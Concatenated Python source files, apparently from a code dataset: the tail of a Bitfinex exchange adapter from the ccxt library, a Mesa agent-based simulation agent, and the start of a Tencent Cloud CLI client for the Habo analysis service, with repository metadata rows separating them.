'ORS': 'ORS Group', # conflict with Origin Sport #3230
'POY': 'POLY',
'QSH': 'QASH',
'QTM': 'QTUM',
'RBT': 'RBTC',
'SEE': 'SEER',
'SNG': 'SNGLS',
'SPK': 'SPANK',
'STJ': 'STORJ',
'TRI': 'TRIO',
'TSD': 'TUSD',
'YYW': 'YOYOW',
'UDC': 'USDC',
'UST': 'USDT',
'UTN': 'UTNP',
'VSY': 'VSYS',
'WAX': 'WAXP',
'XCH': 'XCHF',
'ZBT': 'ZB',
},
'exceptions': {
'exact': {
'temporarily_unavailable': ExchangeNotAvailable, # Sorry, the service is temporarily unavailable. See https://www.bitfinex.com/ for more info.
'Order could not be cancelled.': OrderNotFound, # non-existent order
'No such order found.': OrderNotFound, # ?
'Order price must be positive.': InvalidOrder, # on price <= 0
'Could not find a key matching the given X-BFX-APIKEY.': AuthenticationError,
'Key price should be a decimal number, e.g. "123.456"': InvalidOrder, # on isNaN(price)
'Key amount should be a decimal number, e.g. "123.456"': InvalidOrder, # on isNaN(amount)
'ERR_RATE_LIMIT': RateLimitExceeded,
'Ratelimit': RateLimitExceeded,
'Nonce is too small.': InvalidNonce,
'No summary found.': ExchangeError, # fetchTradingFees(summary) endpoint can give self vague error message
'Cannot evaluate your available balance, please try again': ExchangeNotAvailable,
'Unknown symbol': BadSymbol,
},
'broad': {
'Invalid X-BFX-SIGNATURE': AuthenticationError,
'This API key does not have permission': PermissionDenied, # authenticated but not authorized
'not enough exchange balance for ': InsufficientFunds, # when buying cost is greater than the available quote currency
'minimum size for ': InvalidOrder, # when amount below limits.amount.min
'Invalid order': InvalidOrder, # ?
'The available balance is only': InsufficientFunds, # {"status":"error","message":"Cannot withdraw 1.0027 ETH from your exchange wallet. The available balance is only 0.0 ETH. If you have limit orders, open positions, unused or active margin funding, self will decrease your available balance. To increase it, you can cancel limit orders or reduce/close your positions.","withdrawal_id":0,"fees":"0.0027"}
},
},
'precisionMode': SIGNIFICANT_DIGITS,
'options': {
'currencyNames': {
'AGI': 'agi',
'AID': 'aid',
'AIO': 'aio',
'ANT': 'ant',
'AVT': 'aventus', # #1811
'BAT': 'bat',
# https://github.com/ccxt/ccxt/issues/5833
'BCH': 'bab', # undocumented
# 'BCH': 'bcash', # undocumented
'BCI': 'bci',
'BFT': 'bft',
'BSV': 'bsv',
'BTC': 'bitcoin',
'BTG': 'bgold',
'CFI': 'cfi',
'COMP': 'comp',
'DAI': 'dai',
'DADI': 'dad',
'DASH': 'dash',
'DATA': 'datacoin',
'DTH': 'dth',
'EDO': 'eidoo', # #1811
'ELF': 'elf',
'EOS': 'eos',
'ETC': 'ethereumc',
'ETH': 'ethereum',
'ETP': 'metaverse',
'FUN': 'fun',
'GNT': 'golem',
'IOST': 'ios',
'IOTA': 'iota',
# https://github.com/ccxt/ccxt/issues/5833
'LEO': 'let', # ETH chain
# 'LEO': 'les', # EOS chain
'LINK': 'link',
'LRC': 'lrc',
'LTC': 'litecoin',
'LYM': 'lym',
'MANA': 'mna',
'MIT': 'mit',
'MKR': 'mkr',
'MTN': 'mtn',
'NEO': 'neo',
'ODE': 'ode',
'OMG': 'omisego',
'OMNI': 'mastercoin',
'QASH': 'qash',
'QTUM': 'qtum', # #1811
'RCN': 'rcn',
'RDN': 'rdn',
'REP': 'rep',
'REQ': 'req',
'RLC': 'rlc',
'SAN': 'santiment',
'SNGLS': 'sng',
'SNT': 'status',
'SPANK': 'spk',
'STORJ': 'stj',
'TNB': 'tnb',
'TRX': 'trx',
'TUSD': 'tsd',
'USD': 'wire',
'USDC': 'udc', # https://github.com/ccxt/ccxt/issues/5833
'UTK': 'utk',
'USDT': 'tetheruso', # Tether on Omni
# 'USDT': 'tetheruse', # Tether on ERC20
# 'USDT': 'tetherusl', # Tether on Liquid
# 'USDT': 'tetherusx', # Tether on Tron
# 'USDT': 'tetheruss', # Tether on EOS
'VEE': 'vee',
'WAX': 'wax',
'XLM': 'xlm',
'XMR': 'monero',
'XRP': 'ripple',
'XVG': 'xvg',
'YOYOW': 'yoyow',
'ZEC': 'zcash',
'ZRX': 'zrx',
'XTZ': 'xtz',
},
'orderTypes': {
'limit': 'exchange limit',
'market': 'exchange market',
},
},
})
def fetch_funding_fees(self, params={}):
self.load_markets()
response = self.privatePostAccountFees(params)
fees = response['withdraw']
withdraw = {}
ids = list(fees.keys())
for i in range(0, len(ids)):
id = ids[i]
code = self.safe_currency_code(id)
withdraw[code] = self.safe_float(fees, id)
return {
'info': response,
'withdraw': withdraw,
'deposit': withdraw, # only for deposits of less than $1000
}
def fetch_trading_fees(self, params={}):
self.load_markets()
response = self.privatePostSummary(params)
#
# {
# time: '2019-02-20T15:50:19.152000Z',
# trade_vol_30d: [
# {
# curr: 'Total(USD)',
# vol: 0,
# vol_maker: 0,
# vol_BFX: 0,
# vol_BFX_maker: 0,
# vol_ETHFX: 0,
# vol_ETHFX_maker: 0
# }
# ],
# fees_funding_30d: {},
# fees_funding_total_30d: 0,
# fees_trading_30d: {},
# fees_trading_total_30d: 0,
# maker_fee: 0.001,
# taker_fee: 0.002
# }
#
return {
'info': response,
'maker': self.safe_float(response, 'maker_fee'),
'taker': self.safe_float(response, 'taker_fee'),
}
def fetch_markets(self, params={}):
ids = self.publicGetSymbols()
details = self.publicGetSymbolsDetails()
result = []
for i in range(0, len(details)):
market = details[i]
id = self.safe_string(market, 'pair')
if not self.in_array(id, ids):
continue
id = id.upper()
baseId = None
quoteId = None
if id.find(':') >= 0:
parts = id.split(':')
baseId = parts[0]
quoteId = parts[1]
else:
baseId = id[0:3]
quoteId = id[3:6]
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
precision = {
'price': self.safe_integer(market, 'price_precision'),
# https://docs.bitfinex.com/docs/introduction#amount-precision
# The amount field allows up to 8 decimals.
# Anything exceeding self will be rounded to the 8th decimal.
'amount': 8,
}
limits = {
'amount': {
'min': self.safe_float(market, 'minimum_order_size'),
'max': self.safe_float(market, 'maximum_order_size'),
},
'price': {
'min': math.pow(10, -precision['price']),
'max': math.pow(10, precision['price']),
},
}
limits['cost'] = {
'min': limits['amount']['min'] * limits['price']['min'],
'max': None,
}
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': True,
'precision': precision,
'limits': limits,
'info': market,
})
return result
def amount_to_precision(self, symbol, amount):
# https://docs.bitfinex.com/docs/introduction#amount-precision
# The amount field allows up to 8 decimals.
# Anything exceeding self will be rounded to the 8th decimal.
return self.decimal_to_precision(amount, TRUNCATE, self.markets[symbol]['precision']['amount'], DECIMAL_PLACES)
def price_to_precision(self, symbol, price):
price = self.decimal_to_precision(price, ROUND, self.markets[symbol]['precision']['price'], self.precisionMode)
# https://docs.bitfinex.com/docs/introduction#price-precision
# The precision level of all trading prices is based on significant figures.
# All pairs on Bitfinex use up to 5 significant digits and up to 8 decimals(e.g. 1.2345, 123.45, 1234.5, 0.00012345).
# Prices submit with a precision larger than 5 will be cut by the API.
return self.decimal_to_precision(price, TRUNCATE, 8, DECIMAL_PLACES)
def calculate_fee(self, symbol, type, side, amount, price, takerOrMaker='taker', params={}):
market = self.markets[symbol]
rate = market[takerOrMaker]
cost = amount * rate
key = 'quote'
if side == 'sell':
cost *= price
else:
key = 'base'
code = market[key]
currency = self.safe_value(self.currencies, code)
if currency is not None:
precision = self.safe_integer(currency, 'precision')
if precision is not None:
cost = float(self.currency_to_precision(code, cost))
return {
'type': takerOrMaker,
'currency': market[key],
'rate': rate,
'cost': cost,
}
def fetch_balance(self, params={}):
self.load_markets()
types = {
'exchange': 'exchange',
'deposit': 'funding',
'trading': 'margin',
}
balanceType = self.safe_string(params, 'type', 'exchange')
query = self.omit(params, 'type')
response = self.privatePostBalances(query)
# [{type: 'deposit',
# currency: 'btc',
# amount: '0.00116721',
# available: '0.00116721'},
# {type: 'exchange',
# currency: 'ust',
# amount: '0.0000002',
# available: '0.0000002'},
# {type: 'trading',
# currency: 'btc',
# amount: '0.0005',
# available: '0.0005'}],
result = {'info': response}
for i in range(0, len(response)):
balance = response[i]
type = self.safe_string(balance, 'type')
parsedType = self.safe_string(types, type)
if (parsedType == balanceType) or (type == balanceType):
currencyId = self.safe_string(balance, 'currency')
code = self.safe_currency_code(currencyId)
# bitfinex had BCH previously, now it's BAB, but the old
# BCH symbol is kept for backward-compatibility
# we need a workaround here so that the old BCH balance
# would not override the new BAB balance(BAB is unified to BCH)
# https://github.com/ccxt/ccxt/issues/4989
if not (code in result):
account = self.account()
account['free'] = self.safe_float(balance, 'available')
account['total'] = self.safe_float(balance, 'amount')
result[code] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
request = {
'symbol': self.market_id(symbol),
}
if limit is not None:
request['limit_bids'] = limit
request['limit_asks'] = limit
response = self.publicGetBookSymbol(self.extend(request, params))
return self.parse_order_book(response, None, 'bids', 'asks', 'price', 'amount')
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.publicGetTickers(params)
result = {}
for i in range(0, len(response)):
ticker = self.parse_ticker(response[i])
symbol = ticker['symbol']
result[symbol] = ticker
return self.filter_by_array(result, 'symbol', symbols)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
ticker = self.publicGetPubtickerSymbol(self.extend(request, params))
return self.parse_ticker(ticker, market)
def parse_ticker(self, ticker, market=None):
timestamp = self.safe_float(ticker, 'timestamp')
if timestamp is not None:
timestamp *= 1000
timestamp = int(timestamp)
symbol = None
if market is not None:
symbol = market['symbol']
elif 'pair' in ticker:
marketId = self.safe_string(ticker, 'pair')
if marketId is not None:
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
symbol = market['symbol']
else:
baseId = marketId[0:3]
quoteId = marketId[3:6]
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
last = self.safe_float(ticker, 'last_price')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_float(ticker, 'high'),
'low': self.safe_float(ticker, 'low'),
'bid': self.safe_float(ticker, 'bid'),
'bidVolume': None,
'ask': self.safe_float(ticker, 'ask'),
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': self.safe_float(ticker, 'mid'),
'baseVolume': self.safe_float(ticker, 'volume'),
'quoteVolume': None,
'info': ticker,
}
def parse_trade(self, trade, market):
id = self.safe_string(trade, 'tid')
timestamp = self.safe_float(trade, 'timestamp')
if timestamp is not None:
timestamp = int(timestamp) * 1000
type = None
side = self.safe_string_lower(trade, 'type')
orderId = self.safe_string(trade, 'order_id')
price = self.safe_float(trade, 'price')
amount = self.safe_float(trade, 'amount')
cost = None
if price is not None:
if amount is not None:
cost = price * amount
fee = None
if 'fee_amount' in trade:
feeCost = -self.safe_float(trade, 'fee_amount')
feeCurrencyId = self.safe_string(trade, 'fee_currency')
feeCurrencyCode = self.safe_currency_code(feeCurrencyId)
fee = {
'cost': feeCost,
'currency': feeCurrencyCode,
}
return {
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'type': type,
'order': orderId,
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': fee,
}
def fetch_trades(self, symbol, since=None, limit=50, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'limit_trades': limit,
}
if since is not None:
request['timestamp'] = int(since / 1000)
response = self.publicGetTradesSymbol(self.extend(request, params))
return self.parse_trades(response, market, since, limit)
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a `symbol` argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if limit is not None:
request['limit_trades'] = limit
if since is not None:
request['timestamp'] = int(since / 1000)
response = self.privatePostMytrades(self.extend(request, params))
return self.parse_trades(response, market, since, limit)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
request = {
'symbol': self.market_id(symbol),
'side': side,
'amount': self.amount_to_precision(symbol, amount),
'type': self.safe_string(self.options['orderTypes'], type, type),
'ocoorder': False,
'buy_price_oco': 0,
'sell_price_oco': 0,
}
if type == 'market':
request['price'] = str(self.nonce())
else:
request['price'] = self.price_to_precision(symbol, price)
response = self.privatePostOrderNew(self.extend(request, params))
return self.parse_order(response)
def edit_order(self, id, symbol, type, side, amount=None, price=None, params={}):
self.load_markets()
order = {
'order_id': int(id),
}
if price is not None:
order['price'] = self.price_to_precision(symbol, price)
if amount is not None:
order['amount'] = self.number_to_string(amount)
if symbol is not None:
order['symbol'] = self.market_id(symbol)
if side is not None:
order['side'] = side
if type is not None:
order['type'] = self.safe_string(self.options['orderTypes'], type, type)
response = self.privatePostOrderCancelReplace(self.extend(order, params))
return self.parse_order(response)
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'order_id': int(id),
}
return self.privatePostOrderCancel(self.extend(request, params))
def cancel_all_orders(self, symbol=None, params={}):
return self.privatePostOrderCancelAll(params)
def parse_order(self, order, market=None):
side = self.safe_string(order, 'side')
open = self.safe_value(order, 'is_live')
canceled = self.safe_value(order, 'is_cancelled')
status = None
if open:
status = 'open'
elif canceled:
status = 'canceled'
else:
status = 'closed'
symbol = None
if market is None:
marketId = self.safe_string_upper(order, 'symbol')
if marketId is not None:
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
if market is not None:
symbol = market['symbol']
orderType = order['type']
exchange = orderType.find('exchange ') >= 0
if exchange:
parts = order['type'].split(' ')
orderType = parts[1]
timestamp = self.safe_float(order, 'timestamp')
if timestamp is not None:
timestamp = int(timestamp) * 1000
id = self.safe_string(order, 'id')
return {
'info': order,
'id': id,
'clientOrderId': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': symbol,
'type': orderType,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': self.safe_float(order, 'price'),
'stopPrice': None,
'average': self.safe_float(order, 'avg_execution_price'),
'amount': self.safe_float(order, 'original_amount'),
'remaining': self.safe_float(order, 'remaining_amount'),
'filled': self.safe_float(order, 'executed_amount'),
'status': status,
'fee': None,
'cost': None,
'trades': None,
}
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
if symbol is not None:
if not (symbol in self.markets):
raise ExchangeError(self.id + ' has no symbol ' + symbol)
response = self.privatePostOrders(params)
orders = self.parse_orders(response, None, since, limit)
if symbol is not None:
orders = self.filter_by(orders, 'symbol', symbol)
return orders
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
request = {}
if limit is not None:
request['limit'] = limit
response = self.privatePostOrdersHist(self.extend(request, params))
orders = self.parse_orders(response, None, since, limit)
if symbol is not None:
orders = self.filter_by(orders, 'symbol', symbol)
orders = self.filter_by_array(orders, 'status', ['closed', 'canceled'], False)
return orders
def fetch_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'order_id': int(id),
}
response = self.privatePostOrderStatus(self.extend(request, params))
return self.parse_order(response)
def parse_ohlcv(self, ohlcv, market=None):
#
# [
# 1457539800000,
# 0.02594,
# 0.02594,
# 0.02594,
# 0.02594,
# 0.1
# ]
#
return [
self.safe_integer(ohlcv, 0),
self.safe_float(ohlcv, 1),
self.safe_float(ohlcv, 3),
self.safe_float(ohlcv, 4),
self.safe_float(ohlcv, 2),
self.safe_float(ohlcv, 5),
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
if limit is None:
limit = 100
market = self.market(symbol)
v2id = 't' + market['id']
request = {
'symbol': v2id,
'timeframe': self.timeframes[timeframe],
'sort': 1,
'limit': limit,
}
if since is not None:
request['start'] = since
response = self.v2GetCandlesTradeTimeframeSymbolHist(self.extend(request, params))
#
# [
# [1457539800000,0.02594,0.02594,0.02594,0.02594,0.1],
# [1457547300000,0.02577,0.02577,0.02577,0.02577,0.01],
# [1457550240000,0.0255,0.0253,0.0255,0.0252,3.2640000000000002],
# ]
#
return self.parse_ohlcvs(response, market, timeframe, since, limit)
def get_currency_name(self, code):
# todo rewrite for https://api-pub.bitfinex.com//v2/conf/pub:map:tx:method
if code in self.options['currencyNames']:
return self.options['currencyNames'][code]
raise NotSupported(self.id + ' ' + code + ' not supported for withdrawal')
def create_deposit_address(self, code, params={}):
self.load_markets()
request = {
'renew': 1,
}
response = self.fetch_deposit_address(code, self.extend(request, params))
return response
def fetch_deposit_address(self, code, params={}):
self.load_markets()
# todo rewrite for https://api-pub.bitfinex.com//v2/conf/pub:map:tx:method
name = self.get_currency_name(code)
request = {
'method': name,
'wallet_name': 'exchange',
'renew': 0, # a value of 1 will generate a new address
}
response = self.privatePostDepositNew(self.extend(request, params))
address = self.safe_value(response, 'address')
tag = None
if 'address_pool' in response:
tag = address
address = response['address_pool']
self.check_address(address)
return {
'currency': code,
'address': address,
'tag': tag,
'info': response,
}
def fetch_transactions(self, code=None, since=None, limit=None, params={}):
self.load_markets()
currencyId = self.safe_string(params, 'currency')
query = self.omit(params, 'currency')
currency = None
if currencyId is None:
if code is None:
raise ArgumentsRequired(self.id + ' fetchTransactions() requires a currency `code` argument or a `currency` parameter')
else:
currency = self.currency(code)
currencyId = currency['id']
query['currency'] = currencyId
if since is not None:
query['since'] = int(since / 1000)
response = self.privatePostHistoryMovements(self.extend(query, params))
#
# [
# {
# "id":581183,
# "txid": 123456,
# "currency":"BTC",
# "method":"BITCOIN",
# "type":"WITHDRAWAL",
# "amount":".01",
# "description":"3QXYWgRGX2BPYBpUDBssGbeWEa5zq6snBZ, offchain transfer ",
# "address":"3QXYWgRGX2BPYBpUDBssGbeWEa5zq6snBZ",
# "status":"COMPLETED",
# "timestamp":"1443833327.0",
# "timestamp_created": "1443833327.1",
# "fee": 0.1,
# }
# ]
#
return self.parse_transactions(response, currency, since, limit)
def parse_transaction(self, transaction, currency=None):
#
# crypto
#
# {
# "id": 12042490,
# "fee": "-0.02",
# "txid": "EA5B5A66000B66855865EFF2494D7C8D1921FCBE996482157EBD749F2C85E13D",
# "type": "DEPOSIT",
# "amount": "2099.849999",
# "method": "RIPPLE",
# "status": "COMPLETED",
# "address": "2505189261",
# "currency": "XRP",
# "timestamp": "1551730524.0",
# "description": "EA5B5A66000B66855865EFF2494D7C8D1921FCBE996482157EBD749F2C85E13D",
# "timestamp_created": "1551730523.0"
# }
#
# fiat
#
# {
# "id": 12725095,
# "fee": "-60.0",
# "txid": null,
# "type": "WITHDRAWAL",
# "amount": "9943.0",
# "method": "WIRE",
# "status": "SENDING",
# "address": null,
# "currency": "EUR",
# "timestamp": "1561802484.0",
# "description": "Name: bob, AccountAddress: some address, Account: someaccountno, Bank: bank address, SWIFT: foo, Country: UK, Details of Payment: withdrawal name, Intermediary Bank Name: , Intermediary Bank Address: , Intermediary Bank City: , Intermediary Bank Country: , Intermediary Bank Account: , Intermediary Bank SWIFT: , Fee: -60.0",
# "timestamp_created": "1561716066.0"
# }
#
timestamp = self.safe_float(transaction, 'timestamp_created')
if timestamp is not None:
timestamp = int(timestamp * 1000)
updated = self.safe_float(transaction, 'timestamp')
if updated is not None:
updated = int(updated * 1000)
currencyId = self.safe_string(transaction, 'currency')
code = self.safe_currency_code(currencyId, currency)
type = self.safe_string_lower(transaction, 'type') # DEPOSIT or WITHDRAWAL
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
feeCost = self.safe_float(transaction, 'fee')
if feeCost is not None:
feeCost = abs(feeCost)
return {
'info': transaction,
'id': self.safe_string(transaction, 'id'),
'txid': self.safe_string(transaction, 'txid'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'address': self.safe_string(transaction, 'address'), # todo: self is actually the tag for XRP transfers(the address is missing)
'tag': None, # refix it properly for the tag from description
'type': type,
'amount': self.safe_float(transaction, 'amount'),
'currency': code,
'status': status,
'updated': updated,
'fee': {
'currency': code,
'cost': feeCost,
'rate': None,
},
}
def parse_transaction_status(self, status):
statuses = {
'SENDING': 'pending',
'CANCELED': 'canceled',
'ZEROCONFIRMED': 'failed', # ZEROCONFIRMED happens e.g. in a double spend attempt(I had one in my movementsnot )
'COMPLETED': 'ok',
}
return self.safe_string(statuses, status, status)
def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
self.load_markets()
# todo rewrite for https://api-pub.bitfinex.com//v2/conf/pub:map:tx:method
name = self.get_currency_name(code)
request = {
'withdraw_type': name,
'walletselected': 'exchange',
'amount': self.number_to_string(amount),
'address': address,
}
if tag is not None:
request['payment_id'] = tag
responses = self.privatePostWithdraw(self.extend(request, params))
response = responses[0]
id = self.safe_string(response, 'withdrawal_id')
message = self.safe_string(response, 'message')
errorMessage = self.find_broadly_matched_key(self.exceptions['broad'], message)
if id == 0:
if errorMessage is not None:
ExceptionClass = self.exceptions['broad'][errorMessage]
raise ExceptionClass(self.id + ' ' + message)
raise ExchangeError(self.id + ' withdraw returned an id of zero: ' + self.json(response))
return {
'info': response,
'id': id,
}
def fetch_positions(self, symbols=None, since=None, limit=None, params={}):
self.load_markets()
response = self.privatePostPositions(params)
#
# [
# {
# "id":943715,
# "symbol":"btcusd",
# "status":"ACTIVE",
# "base":"246.94",
# "amount":"1.0",
# "timestamp":"1444141857.0",
# "swap":"0.0",
# "pl":"-2.22042"
# }
# ]
#
# todo unify parsePosition/parsePositions
return response
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
request = '/' + self.implode_params(path, params)
if api == 'v2':
request = '/' + api + request
else:
request = '/' + self.version + request
query = self.omit(params, self.extract_params(path))
url = self.urls['api'][api] + request
if (api == 'public') or (path.find('/hist') >= 0):
if query:
suffix = '?' + self.urlencode(query)
url += suffix
request += suffix
if api == 'private':
self.check_required_credentials()
nonce = self.nonce()
query = self.extend({
'nonce': str(nonce),
'request': request,
}, query)
body = self.json(query)
payload = self.string_to_base64(body)
secret = self.encode(self.secret)
signature = self.hmac(payload, secret, hashlib.sha384)
headers = {
'X-BFX-APIKEY': self.apiKey,
'X-BFX-PAYLOAD': self.decode(payload),
'X-BFX-SIGNATURE': signature,
'Content-Type': 'application/json',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return
if code >= 400:
if body[0] == '{':
feedback = self.id + ' ' + body
message = self.safe_string_2(response, 'message', 'error')
self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)
raise ExchangeError(feedback) # unknown message
| 40.401496 | 426 | 0.456968 |
88566ac20266e896964e385e3e424097743bffdd | 4,933 | py | Python | abm/dda-mesa/dda-mesa/agent.py | nickmalleson/surf | d6b8abb75635ac0fbadb445e67fc50ccb8b19945 | [
"MIT"
] | 3 | 2018-09-15T03:16:33.000Z | 2020-07-11T00:50:39.000Z | abm/dda-mesa/dda-mesa/agent.py | nickmalleson/surf | d6b8abb75635ac0fbadb445e67fc50ccb8b19945 | [
"MIT"
] | null | null | null | abm/dda-mesa/dda-mesa/agent.py | nickmalleson/surf | d6b8abb75635ac0fbadb445e67fc50ccb8b19945 | [
"MIT"
] | 10 | 2016-08-25T13:38:57.000Z | 2021-02-01T10:20:01.000Z | from mesa import Agent
import random
class DDAAgent(Agent):
"""Default DDA agent"""
def __init__(self, unique_id, model):
"""Initialise an agent with a unique_id and a reference to the model"""
super().__init__(unique_id, model)
# Agents need a state - this will be set by the model when the agent is created
self.state = None
# Each should have a colour for display (doesn't affect the analysis)
self.colour = random.choice(["red", "blue", "green", "yellow", "orange", "pink", "green", "purple"])
#print("\tCreated agent {}".format(unique_id))
def step(self):
"""Step the agent"""
# Note: to get the other agents
# print(self.unique_id," have found the agents:",self.model.schedule.agents)
# Randomly move cell. This is to demo how to do it the 'proper way' (computationally expensive
# and unnecessary in this simple model
# self.model.grid.move_agent(self, DDAAgent._get_rand_neighbour_cell(self))
if self.state == AgentStates.RETIRED: # Don't do anything if the agent is retired.
return
x, y = self.pos # The agent's position
# If the agent has reached their destination then they can retire to the graveyard
if self.state == AgentStates.TRAVELLING_FROM_A and self.pos == self.model.loc_b:
self.model.increment_camera_b() # will pass camera b on their way out
self.retire()
return
elif self.state == AgentStates.TRAVELLING_FROM_B and self.pos == self.model.loc_a:
self.model.increment_camera_a() # They will pass camera A on their way out
self.retire()
return
# See if they should leave through the midpoint
if self.pos == self.model.loc_mid:
#print(random.random())
#print(self.model.bleedout_rate)
if random.random() > self.model.bleedout_rate:
self.model.increment_camera_m() # Tell the midpoint camera that they're leaving
self.retire()
return
# Otherwise move
if self.state == AgentStates.TRAVELLING_FROM_A:
self.model.grid.move_agent(self, ((x + 1), 0)) # Move 1 to right (away from point A)
elif self.state == AgentStates.TRAVELLING_FROM_B:
self.model.grid.move_agent(self, ((x - 1), 0)) # Move 1 to left (away from point A)
# XXXX WHAT ABOUT LEAVING FROM THE GRAVEYARD
# # Randomly move
# if x == 0: # If far left, move right (or not)
# self.model.grid.move_agent(self, random.choice([ (x,0), (1,0) ] ) )
# elif x == self.model._width-1: # If far right, move left (or not)
# self.model.grid.move_agent(self, random.choice([(x, 0), (self.model._width-2, 0)]))
# else: # Otherwise chose to move left or right, or not
# self.model.grid.move_agent(self, random.choice([(x, 0), (x-1, 0), (x+1,0) ]))
def activate(self):
"""Take this agent from a RETIRED state into an ACTIVE state (i.e. moving in the street)"""
# Choose a location (either endpoint A or B) and move the agent there
x = random.choice([self.model.loc_a, self.model.loc_b])
self.model.grid.move_agent(self, x)
# Change their state and tell the relevant model camera that they are passing it
if x == self.model.loc_a:
self.state = AgentStates.TRAVELLING_FROM_A
self.model.increment_camera_a()
else:
self.state = AgentStates.TRAVELLING_FROM_B
self.model.increment_camera_b()
def retire(self):
"""Make this agent RETIRE"""
self.model.grid.move_agent(self, self.model.graveyard)
self.state = AgentStates.RETIRED
def __repr__(self):
return "DDAAgent {} (state {})".format(self.unique_id, self.state)
# Other useful functions, for reference more than anything else
@classmethod
def _get_rand_neighbour_cell(cls, agent):
"""Get a neighbouring cell at random. Don't use this, it's very expensive.
Included here for reference (it's the 'proper' mesa way of doing it"""
x, y = agent.pos # (pos is updated by grid.place_agent method when they are initialised in Model)
possible_steps = agent.model.grid.get_neighborhood(
agent.pos,
moore=True,
include_center=True)
return random.choice(possible_steps)
def _agents_with_me(self):
"""Get the agents on the same cell as me (as a list)"""
self.model.grid.get_cell_list_contents([self.pos])
def _agents_near_me(self):
"""Get agents near me (as a list)"""
self.model.grid.get_neighbors(self.pos, moore=True, include_center=False, radius=1)
class AgentStates:
RETIRED, TRAVELLING_FROM_A, TRAVELLING_FROM_B = range(3)
| 41.805085 | 108 | 0.62538 |
5da9fa0411f97f9e5a4e175a9c22d85cf83c4088 | 6,030 | py | Python | tccli/services/habo/habo_client.py | zqfan/tencentcloud-cli | b6ad9fced2a2b340087e4e5522121d405f68b615 | [
"Apache-2.0"
] | null | null | null | tccli/services/habo/habo_client.py | zqfan/tencentcloud-cli | b6ad9fced2a2b340087e4e5522121d405f68b615 | [
"Apache-2.0"
] | null | null | null | tccli/services/habo/habo_client.py | zqfan/tencentcloud-cli | b6ad9fced2a2b340087e4e5522121d405f68b615 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.habo.v20181203 import habo_client as habo_client_v20181203
from tencentcloud.habo.v20181203 import models as models_v20181203
def doStartAnalyse(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.HaboClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.StartAnalyseRequest()
model.from_json_string(json.dumps(args))
rsp = client.StartAnalyse(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.HaboClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeStatusRequest()
model.from_json_string(json.dumps(args))
